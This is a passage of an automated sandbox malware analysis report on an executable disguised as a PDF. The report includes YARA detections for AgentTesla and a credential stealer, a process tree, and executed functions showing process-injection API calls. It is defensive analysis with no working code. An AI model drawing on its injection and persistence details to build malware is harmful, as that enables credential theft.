                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: WerFault.exe PID: 4112 Parent PID: 2092

                                                    General

                                                    Start time:09:47:51
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1956
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: cmd.exe PID: 4488 Parent PID: 1216

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                    Imagebase:0x11d0000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: conhost.exe PID: 3480 Parent PID: 4488

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff724c50000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: timeout.exe PID: 5032 Parent PID: 4488

                                                    General

                                                    Start time:09:47:52
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout 1
                                                    Imagebase:0x1300000
                                                    File size:26112 bytes
                                                    MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Chronological Activities

                                                    Analysis Process: NewApp.exe PID: 1504 Parent PID: 1216

                                                    General

                                                    Start time:09:47:57
                                                    Start date:23/02/2021
                                                    Path:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Imagebase:0xce0000
                                                    File size:20616 bytes
                                                    MD5 hash:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Chronological Activities

                                                    Analysis Process: WerFault.exe PID: 1716 Parent PID: 1216

                                                    General

                                                    Start time:09:48:00
                                                    Start date:23/02/2021
                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 1868
                                                    Imagebase:0x240000
                                                    File size:434592 bytes
                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET

                                                    Chronological Activities

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >

                                                      Analysis Process: A4-058000200390-10-14_REV_pdf.exe PID: 7040 Parent PID: 5816 A4-058000200390-10-14_REV_pdf.exeCOMMON

                                                      Executed Functions

                                                      Function 00E9BFE7, Relevance: 10.5, Strings: 8, Instructions: 456COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D0k$D0k$D0k$e$e$e$e$e
                                                      • API String ID: 0-2844823877
                                                      • Opcode ID: eceff249bf3f86240633747008a0e6a3ee8f5348979c34b649fca91cab76f15f
                                                      • Instruction ID: f36a83d29e572e0e8823d5bc10203b33bd6a36c95bdb650c8a4b42d85c0ca831
                                                      • Opcode Fuzzy Hash: eceff249bf3f86240633747008a0e6a3ee8f5348979c34b649fca91cab76f15f
                                                      • Instruction Fuzzy Hash: 18028F70A002199FDB14DFA5C854BAEBBF2BF89344F248169E406EB395DF349D46CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E918F8, Relevance: 4.5, Strings: 3, Instructions: 725COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: e$e$e
                                                      • API String ID: 0-3304627122
                                                      • Opcode ID: bd9858754005d16c7311ded3d2304e9f37d102464502538f7745373e1a4e43cb
                                                      • Instruction ID: 92d9d9316bdc60bfa67aa3d345db088c03400da9f835245a0b3bc37bc765f30b
                                                      • Opcode Fuzzy Hash: bd9858754005d16c7311ded3d2304e9f37d102464502538f7745373e1a4e43cb
                                                      • Instruction Fuzzy Hash: 1D527C34B011159FCF18DF69C884AAEB7B2BF89315F159169E906EB3A0DB34DC46CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E992E0, Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,00E99F4F,00000000,00000000), ref: 00E9A0A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationThread
                                                      • String ID:
                                                      • API String ID: 4046476035-0
                                                      • Opcode ID: d519e4dae48fccd5a9e35ca050322135501926b16920c4918d7b3337f645420f
                                                      • Instruction ID: 7b16675136af7ea4f82a71ba8d7a2dc1d7443a49585d5c6566b35923c36fd3b3
                                                      • Opcode Fuzzy Hash: d519e4dae48fccd5a9e35ca050322135501926b16920c4918d7b3337f645420f
                                                      • Instruction Fuzzy Hash: 421126B19002089FCB10DF99C589BDEBBF4EB88324F148429E458B7710C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E9A031, Relevance: 1.6, APIs: 1, Instructions: 52nativethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,00E99F4F,00000000,00000000), ref: 00E9A0A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID: InformationThread
                                                      • String ID:
                                                      • API String ID: 4046476035-0
                                                      • Opcode ID: ababe5cd307da8ceaaaabcc0e06421b6eb85946eeed983568c255cf065fe7146
                                                      • Instruction ID: 785f6cb53c561551d92ed1ab9c8d723f9da8e7bf324f9d6dc1a4cec3e346c645
                                                      • Opcode Fuzzy Hash: ababe5cd307da8ceaaaabcc0e06421b6eb85946eeed983568c255cf065fe7146
                                                      • Instruction Fuzzy Hash: 7B1104B59002089FCB10DF9AD989BDEBBF4EB88324F248519E468B7750C775A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E90598, Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0P
                                                      • API String ID: 0-3627920098
                                                      • Opcode ID: d932e7eb56ca39bc482a38bfa8bf245a9039e487d007869655734a9f9e2148eb
                                                      • Instruction ID: 7dd9f400bfb9e549c783a12ab43530e1faa18f7f1d0d26d64aff29a0f4fd2169
                                                      • Opcode Fuzzy Hash: d932e7eb56ca39bc482a38bfa8bf245a9039e487d007869655734a9f9e2148eb
                                                      • Instruction Fuzzy Hash: 3D916D34714300DFCB69AB31D851E2A776BFB993187104928EA06DB359CF3ADD02CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E905A8, Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0P
                                                      • API String ID: 0-3627920098
                                                      • Opcode ID: b250b6bf8ebe5acd30f7676154cfbc4c3e2f762112d093c7f870b94925cd2a80
                                                      • Instruction ID: 46151946940a38f4626749bacc0544fae30a66b87cb30cc825ff5eadccbe359c
                                                      • Opcode Fuzzy Hash: b250b6bf8ebe5acd30f7676154cfbc4c3e2f762112d093c7f870b94925cd2a80
                                                      • Instruction Fuzzy Hash: 18814E34714300DFCB69AB31D451E2A776BFB997187104928E906DB359CF3ADD12CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E9C761, Relevance: .3, Instructions: 330COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbf7a633e29e2e293a876f1bc3e13f4130a028e4d7f447b912d99b480b132e76
                                                      • Instruction ID: ec5a55b006be674410373868bc500f522aa823590592dbf6e0518777d8080145
                                                      • Opcode Fuzzy Hash: cbf7a633e29e2e293a876f1bc3e13f4130a028e4d7f447b912d99b480b132e76
                                                      • Instruction Fuzzy Hash: 48D13871A00109DFDF14EFA9D985AADBBB2FF88344F259465E816BB261D730EC41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E95B10, Relevance: .2, Instructions: 154COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 23284abd128abbbbc6757b4010f97130cb50d8c47657ae9fcf226831ebeb33bb
                                                      • Instruction ID: fa2fb5af5540de6208f62b967423db6f4fd8f279344eefa88460b3658054a30b
                                                      • Opcode Fuzzy Hash: 23284abd128abbbbc6757b4010f97130cb50d8c47657ae9fcf226831ebeb33bb
                                                      • Instruction Fuzzy Hash: A551B0306042058FC714EFB4C452AAEB7B2AF41318F2084ADD005DF3A2DB39DE06CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E90C60, Relevance: .1, Instructions: 81COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e8651965ec6e3f8f49553855c8e935a2c1ffe6951f85ec47627ed8c91c48e73
                                                      • Instruction ID: 436eb25cbbafcf8917b7fd226eee74024073ecb936446c5082dfd0b583d158e1
                                                      • Opcode Fuzzy Hash: 0e8651965ec6e3f8f49553855c8e935a2c1ffe6951f85ec47627ed8c91c48e73
                                                      • Instruction Fuzzy Hash: 822142343183065ACFBC7FB196235AF36556B40A69700482EDA8B9A195CF3FDA1187F0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00E90C50, Relevance: .1, Instructions: 65COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39d5c7871596f640a262ba9176861f61fd57fae10f3891ac24f67e65f75bce22
                                                      • Instruction ID: 008b7badbdf10510af40bb77771eace145cb6fe58ddd6170969fbf51c3cb793c
                                                      • Opcode Fuzzy Hash: 39d5c7871596f640a262ba9176861f61fd57fae10f3891ac24f67e65f75bce22
                                                      • Instruction Fuzzy Hash: 9111723030C3025ACBBD7FB196235EE36555B41A68700496EDA8B9A1D1CF3FCA1187B0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE2A35, Relevance: 1.7, APIs: 1, Instructions: 245processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CE2C76
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 66d89c5791797626cc44b7418254ed389cefbc7a4c9ee9ce1d6440e5447288f7
                                                      • Instruction ID: f9fb4a666d6f4b872c47951288127781fe0ee5b06326531a7de2d19735ccb170
                                                      • Opcode Fuzzy Hash: 66d89c5791797626cc44b7418254ed389cefbc7a4c9ee9ce1d6440e5447288f7
                                                      • Instruction Fuzzy Hash: 44914C75D00219DFDB14CFA4C881BEDBBB6FF48314F148969E809A7250DB749A85CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE2A40, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05CE2C76
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 135586f15170abfe77355e8f9be8e8051c8d09decaf5af8e62f6fd8f511025f3
                                                      • Instruction ID: feab538d515df299aec757f324c003e34b417595ddafb69979684e3eb3d0345f
                                                      • Opcode Fuzzy Hash: 135586f15170abfe77355e8f9be8e8051c8d09decaf5af8e62f6fd8f511025f3
                                                      • Instruction Fuzzy Hash: 12915D75D00219DFDB10CFA4C881BEDBBB6FF48314F148969D809A7250DB749A85CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE3F30, Relevance: 1.7, APIs: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserExceptionDispatcher.NTDLL ref: 05CE3F89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: DispatcherExceptionUser
                                                      • String ID:
                                                      • API String ID: 6842923-0
                                                      • Opcode ID: 6495de93f5d98dfc5149115a8d06a54c6d2033063d3787ee13392a499d24a8bf
                                                      • Instruction ID: 468fab714ea9c4f521e20e422369475cdbfcaee9b8fa71409b21b55571ac1a73
                                                      • Opcode Fuzzy Hash: 6495de93f5d98dfc5149115a8d06a54c6d2033063d3787ee13392a499d24a8bf
                                                      • Instruction Fuzzy Hash: 53A11470E0420A8BDF18DFA9D894B9DBBF2BF54354F198458E011FB390D7749885CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE3F27, Relevance: 1.7, APIs: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • KiUserExceptionDispatcher.NTDLL ref: 05CE3F89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: DispatcherExceptionUser
                                                      • String ID:
                                                      • API String ID: 6842923-0
                                                      • Opcode ID: a3ed66f258dac27abeb5822c5b22a36fd1bbb789cc0abe1fcb56617a625fc6d4
                                                      • Instruction ID: f7ad656a6a8de139922884996112bea4afc13ed6cc8e10fae94000c7e7e92336
                                                      • Opcode Fuzzy Hash: a3ed66f258dac27abeb5822c5b22a36fd1bbb789cc0abe1fcb56617a625fc6d4
                                                      • Instruction Fuzzy Hash: E2611570E00209CBDF18DFA9D888B9DBBF2BF88314F158958D011BB395D775A885CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE21B3, Relevance: 1.6, APIs: 1, Instructions: 70injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CE2248
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 5f2ca6ab5ccb04afd22357099199e596fb261c23b03aa5616f6bcf77b440cc7d
                                                      • Instruction ID: c7e03642d3b6432d322ef6094792be64f1a584b83d74c07098638d39d023e9e6
                                                      • Opcode Fuzzy Hash: 5f2ca6ab5ccb04afd22357099199e596fb261c23b03aa5616f6bcf77b440cc7d
                                                      • Instruction Fuzzy Hash: E22128B59003499FCF00CFA9C885BDEBBF5FF48324F548429E919A7650C778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE21B8, Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05CE2248
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessWrite
                                                      • String ID:
                                                      • API String ID: 3559483778-0
                                                      • Opcode ID: 3bde9b7991497d45d68868ea3b33f890eea8147176fd2469ac6897a5b90ac4d0
                                                      • Instruction ID: 7f05d0b09e217511ba9837c35b1b177bf1ed63d984d3916cf466870f707f8da4
                                                      • Opcode Fuzzy Hash: 3bde9b7991497d45d68868ea3b33f890eea8147176fd2469ac6897a5b90ac4d0
                                                      • Instruction Fuzzy Hash: 7C2127B59003499FCF00CFA9C885BEEBBF5FF48324F108429E919A7650C778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE1210, Relevance: 1.6, APIs: 1, Instructions: 65threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 05CE1296
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: e0136f57212b561552004d24c4d01d37c220d06db8b5e750cf78a9f32fd1fe46
                                                      • Instruction ID: e08ad1b3938cd341e0ddf350018d8a8cd7d9dbf4d69dffa7d0d2cc5b529df08d
                                                      • Opcode Fuzzy Hash: e0136f57212b561552004d24c4d01d37c220d06db8b5e750cf78a9f32fd1fe46
                                                      • Instruction Fuzzy Hash: DA2139B1D002088FDB10CFA9C8857EEBBF4AF48324F55842AD419B7640CB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE24A3, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05CE2528
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 176ccb344049f5439dab142af8509fcbcd12abe04bb6b4c1459f7d705671bd14
                                                      • Instruction ID: 801a2397ec5221ceda6140aa7c5ec76fc40fd60bff2b4f49ea27043cb574326d
                                                      • Opcode Fuzzy Hash: 176ccb344049f5439dab142af8509fcbcd12abe04bb6b4c1459f7d705671bd14
                                                      • Instruction Fuzzy Hash: 492116B18002499FCB00CFA9C985BEEBBF5FF48324F548429E519B7650C778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE24A8, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 05CE2528
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: MemoryProcessRead
                                                      • String ID:
                                                      • API String ID: 1726664587-0
                                                      • Opcode ID: 83c3b2c971a60ef03f6ce5898631669b1c15b265533b38eeb6de0a5e31fb558c
                                                      • Instruction ID: 9e1d5d02fb97957bd21df02c0af0329331286bd9c4a53e87a480a4894d76cfd6
                                                      • Opcode Fuzzy Hash: 83c3b2c971a60ef03f6ce5898631669b1c15b265533b38eeb6de0a5e31fb558c
                                                      • Instruction Fuzzy Hash: DF2128B1C002499FCF00CFA9C885BEEBBF5FF48324F508429E519A7650C778A945CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE1218, Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetThreadContext.KERNEL32(?,00000000), ref: 05CE1296
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ContextThread
                                                      • String ID:
                                                      • API String ID: 1591575202-0
                                                      • Opcode ID: 8a4902f1b2fa19d481a79f663be438f81eb7d2bfcfdcdd68cd91ab265dded6e8
                                                      • Instruction ID: bea369a12c53a3a4d03bb7d113282d679cb4ac462783a36f003b66231d6720fd
                                                      • Opcode Fuzzy Hash: 8a4902f1b2fa19d481a79f663be438f81eb7d2bfcfdcdd68cd91ab265dded6e8
                                                      • Instruction Fuzzy Hash: D22138B1D003088FDB10CFA9C8857EEBBF4EF48224F548429D419B7640CB78A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE3E60, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 05CE3EDE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: KernelObjectSecurity
                                                      • String ID:
                                                      • API String ID: 3015937269-0
                                                      • Opcode ID: 50176abd18655e96f83e45ac0b3de36ea009ececcea0023a20e1928f57eec049
                                                      • Instruction ID: a523677ea711f9ff2ca0ce7ce5f87c8c2e3635f4b2075f9925f80b9be7d02f8a
                                                      • Opcode Fuzzy Hash: 50176abd18655e96f83e45ac0b3de36ea009ececcea0023a20e1928f57eec049
                                                      • Instruction Fuzzy Hash: C221F7B19002499FCB10CF9AC485BEEBBF4FB88324F148429E459A7740D778A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE3E5F, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetKernelObjectSecurity.KERNELBASE(?,?,00000000), ref: 05CE3EDE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: KernelObjectSecurity
                                                      • String ID:
                                                      • API String ID: 3015937269-0
                                                      • Opcode ID: 58769c7a7bbc79f05cc69b96921f998b322bf5a935c559cf75bd6be5fee331e4
                                                      • Instruction ID: a6c0ac8fbbb7333b2f504d2c0455b2bd267dfe1e1218fae5b535ee2b3489882d
                                                      • Opcode Fuzzy Hash: 58769c7a7bbc79f05cc69b96921f998b322bf5a935c559cf75bd6be5fee331e4
                                                      • Instruction Fuzzy Hash: 0521E5B59002499FCB10CF9AC585BEEBBF4AB88324F14842AE459B7740D778A945CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE1EF3, Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05CE1F66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 31d4deab7bc6f532c8e1b5699b63426e7474bc63a7ff7f5d549b6bb289c877f6
                                                      • Instruction ID: 01b2508dbdaa2e581d479b00e98050b6342b6c00f340daff5f322557a5c073e8
                                                      • Opcode Fuzzy Hash: 31d4deab7bc6f532c8e1b5699b63426e7474bc63a7ff7f5d549b6bb289c877f6
                                                      • Instruction Fuzzy Hash: E41156B68002489FCF10CFA9C845BDEBBF5EB48324F148819E519B7650C779A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE1EF8, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 05CE1F66
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 0706d9e91efd3cfae99a62a97e22f6c30b9061e564dbcc7a89ca258ce210104a
                                                      • Instruction ID: 475d6848acdb77fa11c5dc96e2f0ab5626023a60bc63f02da745405efa38ad17
                                                      • Opcode Fuzzy Hash: 0706d9e91efd3cfae99a62a97e22f6c30b9061e564dbcc7a89ca258ce210104a
                                                      • Instruction Fuzzy Hash: BE1156758002089FCF10CFA9C845BDEBBF5AB48324F148819E519A7650C779A944CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE3010, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: b0011eb2ff7f92a2f870a2e1acd669ff070237ed55832765dde3d4f52bcb7540
                                                      • Instruction ID: c642e79a7a82f9b2c034646649c7d804919c7128fca900136e7d6071e713becd
                                                      • Opcode Fuzzy Hash: b0011eb2ff7f92a2f870a2e1acd669ff070237ed55832765dde3d4f52bcb7540
                                                      • Instruction Fuzzy Hash: 0C1158B1D003488FDB10DFA9C8457DEBBF4AB88228F248829D519B7750CB79A944CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 05CE3018, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.706560527.0000000005CE0000.00000040.00000001.sdmp, Offset: 05CE0000, based on PE: false
                                                      Similarity
                                                      • API ID: ResumeThread
                                                      • String ID:
                                                      • API String ID: 947044025-0
                                                      • Opcode ID: eea0af7756be25881a0ce72600849d75432467406b0a4dc7b91c21ea7413a928
                                                      • Instruction ID: 5bc1ac5f9fbf4abac847f2c906db62a2cecc5a28d3a91100700f52588064124d
                                                      • Opcode Fuzzy Hash: eea0af7756be25881a0ce72600849d75432467406b0a4dc7b91c21ea7413a928
                                                      • Instruction Fuzzy Hash: 4E113AB1D003488FDB10DFA9C8457DEFBF4AB88224F148819D519B7750CB79A944CFA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00E95520, Relevance: 6.7, Strings: 5, Instructions: 491COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.697232740.0000000000E90000.00000040.00000001.sdmp, Offset: 00E90000, based on PE: false
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D0k$Xck$Xck$e$e
                                                      • API String ID: 0-2916047319
